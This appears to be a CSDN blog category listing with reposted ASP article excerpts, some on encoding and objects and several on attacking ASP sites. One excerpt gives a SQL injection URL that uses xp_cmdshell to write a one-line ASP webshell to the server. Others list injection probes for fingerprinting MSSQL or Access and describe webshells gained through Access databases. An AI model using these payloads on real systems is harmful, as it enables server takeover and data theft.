![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
ASP.Net(ASP)
默瓜
默默的傻瓜.
展开
-
ASP动转静程序用UTF-8编码生成网页的函数
按照“FSO生成的网页文件默认编码格式以及转换成UTF-8编码方法”,编写函数采用用Adodb.Stream对象,成功生成UTF-8网页文件。以下函数采用FSO对象,文件位置在FSO.ASP。FSO对象的文件编码属性只有三种,系统默认,Unicode,ASCII,并没有我们要的utf-8,所以一般中文系统上使用FSO对象生成的文件都是gb2312网页编码格式,无法生成UTF-8编码,因此,英文转载 2009-11-26 15:04:00 · 929 阅读 · 0 评论 -
ASP注入详细命令40条
<br />1、用^转义字符来写ASP(一句话木马)文件的方法:<br />· http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:/mu.asp';-- <br />· echo ^<%execute^(request^("l"^)^)%^> >c:/m转载 2010-07-25 05:36:00 · 1582 阅读 · 1 评论 -
SQL注入Access导出WebShell 返回
<br />目前有一种在ACCESS数据库下导出Webshell的方法,这个方法是由lake2兄弟提出来的,下面就是我引用他这篇文章的原文:<br />已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。<br />最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。<br />几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txt、htm、html等转载 2010-07-25 05:04:00 · 1708 阅读 · 0 评论 -
《改mdb为asp所带来的灾难》之狗尾续貂
<br />作者:lake2<br />来源:http://blog.csdn.net/lake2/<br /> 目前似乎都流行把mdb格式的数据库改成asp/asa防止被下载,不过大多数时候是不行的。因为我们用浏览器访问数据库会得到乱码,ok,此时我们用网际快车就能轻松的下到数据库。不过下数据库只是一点点皮毛,入侵者还能利用这个asp数据库得到webshell,要是你不清晰的话建议你先看看《改mdb为asp所带来的灾难》。<br /> · 呵呵,怕了吧,那你还改不改mdb为asp呢?答案是要的,我们总不转载 2010-07-25 04:52:00 · 714 阅读 · 0 评论 -
改mdb为asp所带来的灾难
<br />本文作者:SuperHei·Lilo<br />文章性质:原创<br />发布日期:2004-09-16<br /> <br /> 可能是随着网络安全技术的发展吧,管理员的素质都在提高,在使用access+asp系统时,为不数据库被人下载,到把mdb改为asp或asa。先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。一.思路<br /> 大家都知道<% %>为asp文件的标志符,也就是说一转载 2010-07-25 04:46:00 · 556 阅读 · 0 评论 -
总结asp注入时用到的方法
1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 4.注入参数是字符 and [查询条件] and =转载 2010-05-11 19:55:00 · 545 阅读 · 0 评论 -
ASP之对象总结
ADO对象:ConnectionCommandRecordsetRecordStream ASP支持的对象很多,可以自己编写COM组件,下面是我们经常使用的:Server.CreateObject("scripting.filesystemobject")Server.CreateObject("scripting.dictionary")hashtableserver.crea转载 2009-11-26 15:07:00 · 619 阅读 · 0 评论 -
ASP/SQL 注入天书
引言<br />随着 B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的 SQL Injection,即SQL注入。 <br />SQL注入是从正常的 WWW 端口访问,而且表面看起来跟一般的 Web 页面访问没什么区别,所以目前市面的防火墙都转载 2010-07-25 02:40:00 · 408 阅读 · 0 评论